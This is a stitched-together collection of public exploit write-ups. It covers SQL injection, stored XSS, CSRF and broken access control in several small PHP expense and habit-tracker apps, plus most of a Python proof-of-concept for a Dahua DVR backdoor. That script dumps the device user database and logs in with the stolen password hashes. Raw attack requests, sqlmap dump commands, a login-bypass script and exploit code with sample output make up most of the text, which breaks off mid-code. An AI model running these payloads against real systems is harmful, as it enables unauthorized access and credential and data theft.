if(isset($_POST['login']))
{
$email=$_POST['email'];
$password=md5($_POST['password']);
$query=mysqli_query($con,"select ID from tbluser where Email='$email' && Password='$password ' ");
$ret=mysqli_fetch_array($query);
if($ret>0){
$_SESSION['detsuid']=$ret['ID'];
header('location:dashboard.php');
}
else{
$msg="Invalid Details.";
}
}
?>
# Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1
POST /dets/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.65.130/dets/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1
email='+or+1%3d1+--+hyd3sec&password=badPass&login=login
# Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24494
### Stored Cross-Site Scripting (XSS):
> Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security.
### Affected Components:
> add-tracker.php, update-tracker.php
Vulnerable parameters:
- day
- exercise
- pray
- read_book
- vitamins
- laundry
- alcohol
- meat
### Description:
> Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page.
## Proof of Concept:
The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability.
Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value:
```
POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 175
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes
```
## Recommendations
When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
# Exploit Title: Daily Habit Tracker 1.0 - SQL Injection
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24495
### SQL Injection:
> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.
### Affected Components:
> delete-tracker.php
### Description:
> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.
## Proof of Concept:
### Manual Exploitation
The payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds:
```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```
### SQLMap
Save the following request to `delete_tracker.txt`:
```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```
Use `sqlmap` with `-r` option to exploit the vulnerability:
```
sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump
```
## Recommendations
When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
# Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24496
### Broken Access Control:
> Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them.
### Affected Components:
> home.php, add-tracker.php, delete-tracker.php, update-tracker.php
### Description:
> Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials.
## Proof of Concept:
### Unauthenticated Access to Home page
> To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page.
### Create Tracker as Unauthenticated User
To create a tracker, use the following request:
```
POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes
```
### Update Tracker as Unauthenticated User
To update a tracker, use the following request:
```
POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes
```
### Delete Tracker as Unauthenticated User:
To delete a tracker, use the following request:
```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
```
## Recommendations
When using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.
# Exploit Title: Daily Expenses Management System 1.0 - 'username' SQL Injection
# Exploit Author: Daniel Ortiz
# Date: 2020-08-01
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Tested on: XAMPP Version 5.6.40 / Windows 10
# Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
import sys
import requests
import urllib3
import re
import time
urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning)
def make_request(url, payload):
p = {"http":"127.0.0.1:8080", "https": "127.0.0.1:8080"}
s = requests.Session()
r = s.post(url, data=payload, proxies=p)
return r
if __name__ == '__main__':
if len(sys.argv) != 2:
print("[*] Daily Expenses Management System | username SQL injection")
print("[*] usage: %s TARGET" % sys.argv[0])
print("[*] e.g: %s 192.168.0.10" % sys.argv[0])
sys.exit(-1)
TARGET = sys.argv[1]
LOGIN_FORM = "http://%s/dets/" % TARGET
# Step 1 - Bypass login form
url = LOGIN_FORM
p1 = {'email': "admin' or '1'='1'#", 'password': 'admin', 'login': 'login'}
r = make_request(url, p1)
print("[+] Endpoint: %s") % LOGIN_FORM
print("[+] Making requests with payload: %s") % p1
if re.findall('Dashboard', r.text):
print("[+] Target vulnerable")
else:
print("[-] Error !!!")
# Exploit Title: Daily Expenses Management System 1.0 - 'item' SQL Injection
# Date: 2020-08-05
# Exploit Author: Edo Maland
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Version: 1.0
# Tested on: XAMPP / Windows 10
-------------------------------------------------------------------------------------------------------------------------------------
# Feature: Add Expenses
# Vulnerable file: add-expense.php
# Vulnerable parameter :
- item
- costitem
# PoC
Url : http://example.com/dets/add-expense.php
Methode : Post
# Burpsuite Requests
POST /dets/add-expense.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/add-expense.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1
dateexpense=1337-11-11&item=1%27+AND+%28SELECT+8429+FROM+%28SELECT%28SLEEP%285%29%29%29IWeV%29+AND+%27hmPP%27%3D%27hmPP&costitem=2&submit=
# Payload
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: dateexpense=1337-11-11&item=1' AND (SELECT 8429 FROM (SELECT(SLEEP(5)))IWeV) AND 'hmPP'='hmPP&costitem=2&submit=
# Sqlmap Command
sqlmap -u "http://example.com/alphaware/summary.php?tid=1337*" --dbs --random-agent -v 3
-------------------------------------------------------------------------------------------------------------------------------------
# Feature: Edit Profile
# Vulnerable file: user-profile.php
# Vulnerable parameter :
- fullname
# PoC
Url : http://example.com/dets/user-profile.php
Methode : Post
# Burpsuite Requests
POST /dets/user-profile.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 189
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/user-profile.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1
fullname=%27+AND+%28SELECT+2029+FROM+%28SELECT%28SLEEP%285%29%29%29JJJm%29+AND+%27UMUq%27%3D%27UMUq&email=info%40sql.id&contactnumber=1337173137®date=2020-08-05+13%3A49%3A51&submit=
# Payload
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fullname=admin3' AND (SELECT 2029 FROM (SELECT(SLEEP(5)))JJJm) AND 'UMUq'='UMUq&email=info@sql.id&contactnumber=1337173137®date=2020-08-05 13:49:51&submit=
# Sqlmap Command
sqlmap -u "https://example.com/dets/user-profile.php" --data="fullname=admin3*&email=info%40sql.id&contactnumber=1337173137®date=2020-08-05+13%3A49%3A51&submit=" --random-agent --threads 5 --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" -v 3 --dbs
-------------------------------------------------------------------------------------------------------------------------------------
# Feature: Expense Reports
# Vulnerable file:
- expense-monthwise-reports-detailed.php
- expense-datewise-reports.php
- expense-yearwise-reports.php
# Vulnerable parameter :
- fromdate
- todate
# PoC
Url : http://example.com/dets/expense-monthwise-reports-detailed.php
Methode : Post
# Burpsuite Requests
POST /dets/expense-yearwise-reports-detailed.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/expense-yearwise-reports.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1
fromdate=2020-08-13'+AND+(SELECT+1473+FROM+(SELECT(SLEEP(5)))rhGI)+AND+'moGo'%3d'moGo&todate=2020-08-20&submit=
# Payload
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2020-08-13' AND (SELECT 1473 FROM (SELECT(SLEEP(5)))rhGI) AND 'moGo'='moGo&todate=2020-07-29&submit=
# Sqlmap Command
sqlmap -u "https://example.com/dets/expense-monthwise-reports-detailed.php" --data="fromdate=2020-08-13*&todate=2020-07-29&submit=" --random-agent --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" --dbs
-------------------------------------------------------------------------------------------------------------------------------------
# Feature: Login Page
# Bypass Login Using SQLi on Admin/Member
# Vulnerable file: index.php
# PoC
URL : https://example.com/dets/index.php
Logging in with following details:
- Payload : "' OR 1=1 -- '"@sql.id
# Burp Requests
POST /dets/index.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/index.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1
email="' OR 1=1 -- '"@sql.id&password=1337&login=login
# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: August 8, 2019
# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
# Tested Version: 1.0
# Tested on: Parrot OS
# PoC:
<html>
<body>
<form action="http://server/homeedit.php?delincome=778" method="post">
<input type="submit" value="Click!" />
</form>
</body>
</html>
# Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi
# Date: February 25th, 2024
# Exploit Author: Stefan Hesselman
# Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/
# Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip
# Version: 1.0
# Tested on: Kali Linux
# CVE: N/A
# CWE: CWE-89, CWE-74
## Description
Daily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker
can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database.
## Vulnerable endpoint:
http://example.com/Daily-Expense-Manager/readxp.php?term=asd
## Vulnerable HTTP parameter:
term (GET)
## Exploit proof-of-concept:
http://example.com/Daily-Expense-Manager/readxp.php?term=asd%27%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6--%20-
## Vulnerable PHP code:
File: /Daily-Expense-Manager/readxp.php, Lines: 16-23
<?php
[...]
//get search term
$searchTerm = $_GET['term']; # unsanitized and under control of the attacker.
//get matched data from skills table
$query = $conn->query("SELECT * FROM expense WHERE pname like '%$searchTerm%' AND uid='$sid' and isdel='0' group by pname");
while ($row = $query->fetch_assoc()) {
$data[] = $row['pname'];
}
//return json data
echo json_encode($data);
?>
# # # # #
# Exploit Daily Deals Script v1.0 - SQL Injection
# Google Dork: N/A
# Date: 07.03.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software : http://www.icloudcenter.com/daily_deals_site.htm
# Demo: http://icloudcenter.net/demos/icgroupdeals/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/deal.php?id=[SQL]
# # # # #
#!/usr/bin/python2.7
if False: '''
2017-05-03
Public rerelease of Dahua Backdoor PoC
https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py
2017-03-20
With my newfound knowledge of vulnerable devices out there with an unbelievable number of more than 1 million Dahua / OEM units, where knowledge comes from a report made by NSFOCUS and my own research on shodan.io.
With this knowledge, I will not release the Python PoC to the public as before said of April 5, as it is not necessary when the PoC has already been verified by IPVM and other independent security researchers.
However, I'm open to share the PoC with serious security researchers if so desired, please e-mail me off list and be clear about who you are so I do not take you for a beggar, which I ignore.
NSFOCUS report: http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/
/bashis
[STX]
I'm speechless, and almost don't know what I should write... I (hardly) can't believe what I have just found.
I have just discovered (to what I strongly believe is backdoor) in Dahua DVR/NVR/IPC and possible all their clones.
Since I am convinced this is a backdoor, I have my own policy to NOT notify the vendor before the community.
(I simply don't want to listen on their poor excuses, their tryings to keep me silent for informing the community)
In short:
You can delete/add/change name on the admin users, you change password on the admin users - this backdoor simply don't care about that!
It uses whatever names and passwords you configuring - by simply downloading the full user database and use your own credentials!
This is so simple as:
1. Remotely download the full user database with all credentials and permissions
2. Choose whatever admin user, copy the login names and password hashes
3. Use them as source to remotely login to the Dahua devices
This is like a damn Hollywood hack, click on one button and you are in...
Below PoC you will find here: https://github.com/mcw0/PoC/dahua-backdoor.py
Update:
Dahua has requested me to temporally remove the PoC code, will be back here again 5th April. (30 days)
/Sorry, bashis
Please have understanding of the quick hack of the PoC, I'm sure it could be done better.
Have a nice day
/bashis
$ ./dahua-backdoor.py --rhost 192.168.5.2
[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]
[i] Remote target IP: 192.168.5.2
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 2 found
[i] Chosing Admin Login: 888888, PWD hash: 4WzwxXxM
[>] Requesting our session ID
[<] 200 OK
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 100385023 }
[>] Logging out
[<] 200 OK
[*] All done...
$
$ ./dahua-backdoor.py --rhost 192.168.5.3
[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]
[i] Remote target IP: 192.168.5.3
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 3 Found
[i] Choosing Admin Login: admin, Auth: 27
[>] Requesting our session ID
[<] 200 OK
[i] Downloaded MD5 hash: 94DB0778856B11C0D0F5455CCC0CE074
[i] Random value to encrypt with: 1958557123
[i] Built password: admin:1958557123:94DB0778856B11C0D0F5455CCC0CE074
[i] MD5 generated password: 2A5F4F7E1BB6F0EA6381E4595651A79E
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 1175887285 }
[>] Logging out
[<] 200 OK
[*] All done...
$
[ETX]
'''
#
# Dahua backdoor PoC Generation 2 and 3
# Author: bashis <mcw noemail eu> March 2017
# Credentials: No Credentials needed (Exploited as Anonymous)
# Note: PoC intentionally missing essential details to be direct usable for anything else than login/logout.
#
# Vendor URL: http://www.dahuasecurity.com/
#
# Patched firmware can be downloaded from newly introduced 'Firmware download function'
# (Don't mind the old date stamps, these should all be the hotfixed updates)
# http://www.dahuasecurity.com/download_111.html
#
#
# -[ Facts ]-
#
# 1) Requirements
# 1.1) You need to know what you want to request
# 1.2) You need to know how to request what you want
# - When you know this, remote device will give you what you want, without any complains
# 1.3) You need to know how to process the results of your requests
# 1.4) You need to know how to send your processed results back to remote device
# - When you know this, you will be granted full access to remote device, without any complains
#
# 2) Direct file access
# 2.1) /mnt/mtd/Config/{passwd|Account1} downloadable with /current_config/{passwd|Account1} by HTTP/HTTPS
# 2.2) User database hash in format: <username>:<realm>:<password>
# 2.3) /mnt/mtd are read/writable - so sensitive files could (must!) be somewhere else, protected, and not remotely accessible.
# 2.4) /mnt/mtd/Config contains also of intentionally public accessible files (WebCapConfig and preLanguage)
# 2.5) There is several other files that should (must!) not be remotely accessible either (Config1 for example)
#
# 3) Passing the hash
# 3.1) Generation 1 - Base64 encoded (Not in this PoC, since I don't know what I want to request, but I could guess same format as 2.2)
# 3.2) Generation 2 - No processing needed; only to pass on the hash
# 3.3) Generation 3 - New 'improved' MD5 random hash must be generated with additional details, that we simply requesting from remote
# 3.4) New MD5 random hash has to be generated as: <username>:<random>:[MD5 format as in user database (2.2)]
#
# - Not less than three times, Dahua have been poking around in the file structure and in the relevant functions of the source code
# - Changed file names, structure of user database, added/removed both public and sensitive files.
# - And never once wondered;
# 1. 'Hm, why I'm allowed to access these newly added files without login request?'
# 2. 'Hm, I know that file is the user database, can I access that one too without login request?'
# 3. 'Hm, I know that file is the device config, can I access that one too without login request?'
# - Really? Are you kidding me?
#
# When you know all above, and have full access to remote device, the whole thing looks so easy, actually way too easy to be true.
#
#
# -[ Most importantly ]-
#
# 1) Undocumented direct access to certain file structures, and used from some of Dahuas own .js to load 'WebCapConfig' and 'preLanguage'
# 2) Direct and indirect re-usage of hashes possible, however with MD5 hash 'security improvements' in Generation 3
# 3) Essential needs for successful login we simply request from remote device and process, no need to guess nor bruteforce anything
# 4) Abnormally wide range of products and firmware versions that share same reliable attack method, to be 'just an vulnerability'
# - True vulnerability over a wide range products and firmware versions have always some unexpected anomalies, which is expected
# 5) Dahua has lots of debug code compiled into the Firmware that may/normally listening on TCP/6789, although protected by l/p authorization
# - Dahua has been kindly asked to remove all debug code from production firmware, as this access and code do not belong in end user devices
# 6) The admin account '888888' is claimed by Dahua to be limited for local login with 'monitor and mouse' only, and not from remote
# - However, that validation is done locally in users browser by 'loginEx.js', and has therefore no practical effect
# 7) The 'hotfix' remediation was done by hardcoding from full access to two intentionally public accessible files (WebCapConfig and preLanguage)
#
#
# -[ Did Dahua confirm the backdoor by mistake? ]-
#
# Don't know if you noticed that the 'new' patches that was pushed out days after my initital post at IPVM,
# they had different old date stamps, and same old date stamps (as on the archives) was on all inside binaries as well.
#
# Screenshots
# https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png
# https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png
#
# URL
# http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php
# https://dahuawiki.com/images/Firmware/DVR/Q2.2017/
#
# And, bit interesting, Dahua continued to use old date stamps on newly generated firmware updates/hotfixes
#
# -[ Method of discovery ]-
#
# Researching by dissasembling of Dahuas main binaries 'Challenge' / 'Sonia'
# What got me curios, was abnormally empty inside of the image I was initally checking, and of course the big binary 'Challenge'
# What got me on track, was the lack of references to sensitive files
# Missing user database and Config in the archives, only a unused and read-only /etc/passwd was found
# Noticed that sensitive files was generated by the binary at startup
# Noticed checkings after sensitive files in different directories, to use 'defaults' as last resource
# Noticed the mix of intentionally public files and sensitive files in same directory
# Reading of the .htm and .js that was found in the image
# ...etc.
#
#
# -[ My Full Disclosure Policy ]-
#
# Normal vulnerabilites: I collect enough information about my findings and trying to notify the vendor to have coordinated disclosure
# Backdoors: If/when they are intended, the vendors wants to hide/keep them (of course), what would you suggest? Notify the vendor or Full Disclosure?
# Proof of claim: Screenshots or some Youtube video would not proof anything, so the claim couldn't be posted without real hard cold facts
# - Professionals within the CCTV industry needed to know, and the only place I knew were many of them, was at IPVM, and therefore the first post was made there.
#
#
# -[ Next Generation Backdoors ]-
#
# That is in my opinion vendors P2P Cloud solutions.
#
# With P2P, these kind of backdoor implementations as shown in this PoC will then not be needed,
# since with P2P you practically giving away your credentials and addresses to your devices!
# And the connection to P2P, your devices initiates and keeps open. (For me, it is similar to reverse shell)
#
#
# -[ Hat's ]-
#
# I don't wear hats, I wear caps... (when it's cold)
#
#
# -[ Function of this PoC code ]-
#
# 1) Check and dump the remote user database (Generation 2 or 3)
# 2) Find first availible admin user and extract their login/pwd hash
# 3) Request session ID, compute new hash if needed (Generation 3)
# 4) Login and logout to/from remote device
#
#
# -[ Credits ]-
#
# binwalk (https://github.com/devttys0/binwalk)
# - Nothing easy could been done without binwalk, awesome tool. Thanks!
#
# IPVM (https://ipvm.com/)
# - For pickup of the claim and to make PoC report, so this Python PoC could be taken down.
#
# Full Disclosure (http://seclists.org/fulldisclosure/)
# - For existing, without your e-mail list, sensitive stuff would be quite difficult to uncover.
# - Fyodor, thanks again.
#
# And, big thanks to all authors for all other stuff and tools that's needed to successfully execute research within binaries
# - To many for naming.
#
# Have a nice day
# /bashis
#
import string
import sys
import socket
import argparse
import urllib, urllib2, httplib
import base64
import ssl
import json
import commentjson # pip install commentjson
import hashlib
class HTTPconnect:
def __init__(self, host, proto, verbose, creds, Raw):
self.host = host
self.proto = proto
self.verbose = verbose
self.credentials = creds
self.Raw = Raw
def Send(self, uri, query_headers, query_data,ID):
self.uri = uri
self.query_headers = query_headers
self.query_data = query_data
self.ID = ID
# Connect-timeout in seconds
timeout = 5
socket.setdefaulttimeout(timeout)
url = '{}://{}{}'.format(self.proto, self.host, self.uri)
if self.verbose:
print "[Verbose] Sending:", url
if self.proto == 'https':
if hasattr(ssl, '_create_unverified_context'):
print "[i] Creating SSL Unverified Context"
ssl._create_default_https_context = ssl._create_unverified_context
if self.credentials:
Basic_Auth = self.credentials.split(':')
if self.verbose:
print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1]
try:
pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
except Exception as e:
print "[!] Basic Auth Error:",e
sys.exit(1)
if self.query_data:
request = urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers)
else:
request = urllib2.Request(url, None, headers=self.query_headers)
response = urllib2.urlopen(request)
# print response
if response:
print "[<] {} OK".format(response.code)
if self.Raw:
return response
else:
html = response.read()
return html
class Dahua_Backdoor:
def __init__(self, rhost, proto, verbose, creds, Raw):
self.rhost = rhost
self.proto = proto
self.verbose = verbose
self.credentials = creds
self.Raw = Raw
#
# Generation 2
#
def Gen2(self,response,headers):
self.response = response
self.headers = headers
html = self.response.readlines()
if self.verbose:
for lines in html:
print "{}".format(lines)
#
# Check for first availible admin user
#
for line in html:
if line[0] == "#" or line[0] == "\n":
continue
line = line.split(':')[0:25]
if line[3] == '1': # Check if user is in admin group
USER_NAME = line[1] # Save login name
PWDDB_HASH = line[2]# Save hash
print "[i] Choosing Admin Login [{}]: {}, PWD hash: {}".format(line[0],line[1],line[2])
break
#
# Login 1
#
print "[>] Requesting our session ID"
query_args = {"method":"global.login",
"params":{
"userName":USER_NAME,
"password":"",
"clientType":"Web3.0"},
"id":10000}
URI = '/RPC2_Login'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)
json_obj = json.load(response)
if self.verbose:
print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': '))
#
# Login 2
#
print "[>] Logging in"
query_args = {"method":"global.login",
"session":json_obj['session'],
"params":{
"userName":USER_NAME,
"password":PWDDB_HASH,
"clientType":"Web3.0",
"authorityType":"OldDigest"},
"id":10000}
URI = '/RPC2_Login'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,json_obj['session'])
print response.read()
#
# Wrong username/password
# { "error" : { "code" : 268632071, "message" : "Component error: password not valid!" }, "id" : 10000, "result" : false, "session" : 1997483520 }
